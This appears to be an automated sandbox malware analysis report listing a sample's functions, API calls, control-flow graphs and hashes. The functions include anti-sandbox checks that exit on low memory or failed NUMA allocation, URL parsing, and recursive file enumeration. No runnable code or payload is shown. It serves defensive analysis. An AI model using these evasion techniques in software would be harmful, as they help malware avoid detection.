                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 6b1b37d06cd96115c0bb78c145f1967dbb5c3457922e02cd1f6b7c74115f617a
                                • Instruction ID: e49ac8777d79c7a9575142994e0c56dbf013b20a0fae559b0a48afc3982f9033
                                • Opcode Fuzzy Hash: 6b1b37d06cd96115c0bb78c145f1967dbb5c3457922e02cd1f6b7c74115f617a
                                • Instruction Fuzzy Hash: EC3190B1D482099FCB14CFB899899EFBFBCEF58750F10416EE615F7244E2349A408BA1
                                Function 00E44BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 e44bc0-e44bce 2794 e44bd0-e44bd5 2793->2794 2794->2794 2795 e44bd7-e44c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call e42a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00E44BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E44C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E44C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00E44C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00E44C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 84e29408be2ef7048db8c2c4796585b5d797592be7a71bcbf6552b7446b44a21
                                • Instruction ID: 9951676312a420ddb3a67e4ec31e9cd6bfb71102537e806288dd0e3c10800721
                                • Opcode Fuzzy Hash: 84e29408be2ef7048db8c2c4796585b5d797592be7a71bcbf6552b7446b44a21
                                • Instruction Fuzzy Hash: 26012D71D00218AFDB14DFA9E849B9EBBB8EB08364F00812AF954F7390DB7459058FD4
                                Function 00E41030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 e41030-e41055 GetCurrentProcess VirtualAllocExNuma 2799 e41057-e41058 ExitProcess 2798->2799 2800 e4105e-e4107b VirtualAlloc 2798->2800 2801 e41082-e41088 2800->2801 2802 e4107d-e41080 2800->2802 2803 e410b1-e410b6 2801->2803 2804 e4108a-e410ab VirtualFree 2801->2804 2802->2801 2804->2803
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                • ExitProcess.KERNEL32 ref: 00E41058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E4106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E410AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 25a34c7fa5dbd561bee02f0213992a20907d4898e1d96b1ea4fd99d75e65771b
                                • Instruction ID: 9e9e5d5272282bbdded8c0fb7c0e803a2ab4ef5015135e421a7a7cadbb4e428c
                                • Opcode Fuzzy Hash: 25a34c7fa5dbd561bee02f0213992a20907d4898e1d96b1ea4fd99d75e65771b
                                • Instruction Fuzzy Hash: F901F971B402047BEB2045656C1DF5B77ADA744B19F308014F744F72C4D9B6E9008664
                                Function 00E5EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 e5ee90-e5eeb5 call e42930 2808 e5eeb7-e5eebf 2805->2808 2809 e5eec9-e5eecd call e46c40 2805->2809 2808->2809 2810 e5eec1-e5eec3 lstrcpy 2808->2810 2812 e5eed2-e5eee8 StrCmpCA 2809->2812 2810->2809 2813 e5ef11-e5ef18 call e42a20 2812->2813 2814 e5eeea-e5ef02 call e42a20 call e42930 2812->2814 2819 e5ef20-e5ef28 2813->2819 2824 e5ef45-e5efa0 call e42a20 * 10 2814->2824 2825 e5ef04-e5ef0c 2814->2825 2819->2819 2821 e5ef2a-e5ef37 call e42930 2819->2821 2821->2824 2830 e5ef39 2821->2830 2825->2824 2826 e5ef0e-e5ef0f 2825->2826 2829 e5ef3e-e5ef3f lstrcpy 2826->2829 2829->2824 2830->2829
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E5EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E5EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: 8cbb9937e4f3f0b1d9e63f6cd8f6a8e447348288435ff03504dbee5151d9c3b4
                                • Instruction ID: 6e62a909ddac344eea38e812bd6110eb6f3e497ccf87c2980ef7ecc9afddb709
                                • Opcode Fuzzy Hash: 8cbb9937e4f3f0b1d9e63f6cd8f6a8e447348288435ff03504dbee5151d9c3b4
                                • Instruction Fuzzy Hash: 9921FD706202059BCB25BF79EC46A9A77E4AF14305F44682CBD4AFB342DF30ED1487A0
                                Function 00E410C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 e410c0-e410cb 2887 e410d0-e410dc 2886->2887 2889 e410de-e410f3 GlobalMemoryStatusEx 2887->2889 2890 e410f5-e41106 2889->2890 2891 e41112-e41114 ExitProcess 2889->2891 2892 e41108 2890->2892 2893 e4111a-e4111d 2890->2893 2892->2891 2894 e4110a-e41110 2892->2894 2894->2891 2894->2893
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 789bfca02ca89242d542df3788d9834d24bfff0a74c20a323e0dd4ea019d3e4c
                                • Instruction ID: f764683902b9fc2f047707a9873b14ff1e03380cbfb90d4c64611c1e1a529ea5
                                • Opcode Fuzzy Hash: 789bfca02ca89242d542df3788d9834d24bfff0a74c20a323e0dd4ea019d3e4c
                                • Instruction Fuzzy Hash: 2EF05C701182484BEF206B64F80A32DF7D8EB04354F1019A9EEDBE2380E230DCC08267
                                Function 00E58C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 e58c88-e58cc4 StrCmpCA 2897 e58cc6-e58cc7 ExitProcess 2895->2897 2898 e58ccd-e58ce6 2895->2898 2900 e58ee2-e58eef call e42a20 2898->2900 2901 e58cec-e58cf1 2898->2901 2903 e58cf6-e58cf9 2901->2903 2905 e58ec3-e58edc 2903->2905 2906 e58cff 2903->2906 2905->2900 2945 e58cf3 2905->2945 2907 e58d84-e58d92 StrCmpCA 2906->2907 2908 e58da4-e58db8 StrCmpCA 2906->2908 2909 e58d06-e58d15 lstrlen 2906->2909 2910 e58e6f-e58e7d StrCmpCA 2906->2910 2911 e58e88-e58e9a lstrlen 2906->2911 2912 e58e56-e58e64 StrCmpCA 2906->2912 2913 e58d30-e58d3f lstrlen 2906->2913 2914 e58dbd-e58dcb StrCmpCA 2906->2914 2915 e58ddd-e58deb StrCmpCA 2906->2915 2916 e58dfd-e58e0b StrCmpCA 2906->2916 2917 e58e1d-e58e2b StrCmpCA 2906->2917 2918 e58e3d-e58e4b StrCmpCA 2906->2918 2919 e58d5a-e58d69 lstrlen 2906->2919 2907->2905 2932 e58d98-e58d9f 2907->2932 2908->2905 2920 e58d17-e58d1c call e42a20 2909->2920 2921 e58d1f-e58d2b call e42930 2909->2921 2910->2905 2924 e58e7f-e58e86 2910->2924 2925 e58ea4-e58eb0 call e42930 2911->2925 2926 e58e9c-e58ea1 call e42a20 2911->2926 2912->2905 2923 e58e66-e58e6d 2912->2923 2927 e58d41-e58d46 call e42a20 2913->2927 2928 e58d49-e58d55 call e42930 2913->2928 2914->2905 2933 e58dd1-e58dd8 2914->2933 2915->2905 2934 e58df1-e58df8 2915->2934 2916->2905 2935 e58e11-e58e18 2916->2935 2917->2905 2936 e58e31-e58e38 2917->2936 2918->2905 2922 e58e4d-e58e54 2918->2922 2929 e58d73-e58d7f call e42930 2919->2929 2930 e58d6b-e58d70 call e42a20 2919->2930 2920->2921 2954 e58eb3-e58eb5 2921->2954 2922->2905 2923->2905 2924->2905 2925->2954 2926->2925 2927->2928 2928->2954 2929->2954 2930->2929 2932->2905 2933->2905 2934->2905 2935->2905 2936->2905 2945->2903 2954->2905 2955 e58eb7-e58eb9 2954->2955 2955->2905 2956 e58ebb-e58ebd lstrcpy 2955->2956 2956->2905
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: ab3a7082d01aa9507a9d88572b3976939b6df985ca8422520b8020d67190b143
                                • Instruction ID: 521e7cee3e636ccaf95d582bd068116a2e2086bed3b46817e12d468b8ad5cd80
                                • Opcode Fuzzy Hash: ab3a7082d01aa9507a9d88572b3976939b6df985ca8422520b8020d67190b143
                                • Instruction Fuzzy Hash: 16E0D86491C34DAFC7319EB59D59CD67B5CCF15200F400569BE445B640E524AE08C3EA
                                Function 00E4100D Relevance: 4.5, APIs: 3, Instructions: 35memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                • ExitProcess.KERNEL32 ref: 00E41058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E4106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E410AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 260b0117852eba75402ae8e689ecb97103a5cba9287088da2efa1cea80d29ca1
                                • Instruction ID: f26b95707afe3ff1c08a6f6abde673efaf977e3fa57927052f52e192b0b1183f
                                • Opcode Fuzzy Hash: 260b0117852eba75402ae8e689ecb97103a5cba9287088da2efa1cea80d29ca1
                                • Instruction Fuzzy Hash: F3E08670B983943FF53306619C0EF163A2C5741B14F004055F385FA0C2D59AA5048A75

                                Non-executed Functions

                                Function 00E52390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E523D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E523F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52402
                                • lstrlen.KERNEL32(\*.*), ref: 00E5240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E52436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E52486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 89ec1364a0b384e0025d72ac28c96a611eb66ef81732400e2ba8cca37b558da0
                                • Instruction ID: bca8944be9144fbf66305d0de0987efa9f6fb73a0c8b91a819ace5aec1bc94dc
                                • Opcode Fuzzy Hash: 89ec1364a0b384e0025d72ac28c96a611eb66ef81732400e2ba8cca37b558da0
                                • Instruction Fuzzy Hash: 08A28031A112169FCB21AF78EC49AAE77F8AF45319F04A42CFE45B7245DB34DD058BA0
                                Function 00E416A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E416E2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4176C
                                • lstrcat.KERNEL32(00000000), ref: 00E41776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E417F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41875
                                • lstrcat.KERNEL32(00000000), ref: 00E4187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E418AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E418F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E418FE
                                • lstrlen.KERNEL32(00E71794), ref: 00E41909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41929
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41966
                                • lstrlen.KERNEL32(\*.*), ref: 00E41971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E4199A
                                  • Part of subcall function 00E64040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00E6406D
                                  • Part of subcall function 00E64040: lstrcpy.KERNEL32(00000000,?), ref: 00E640A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E419C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A16
                                • lstrlen.KERNEL32(00E71794), ref: 00E41A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A41
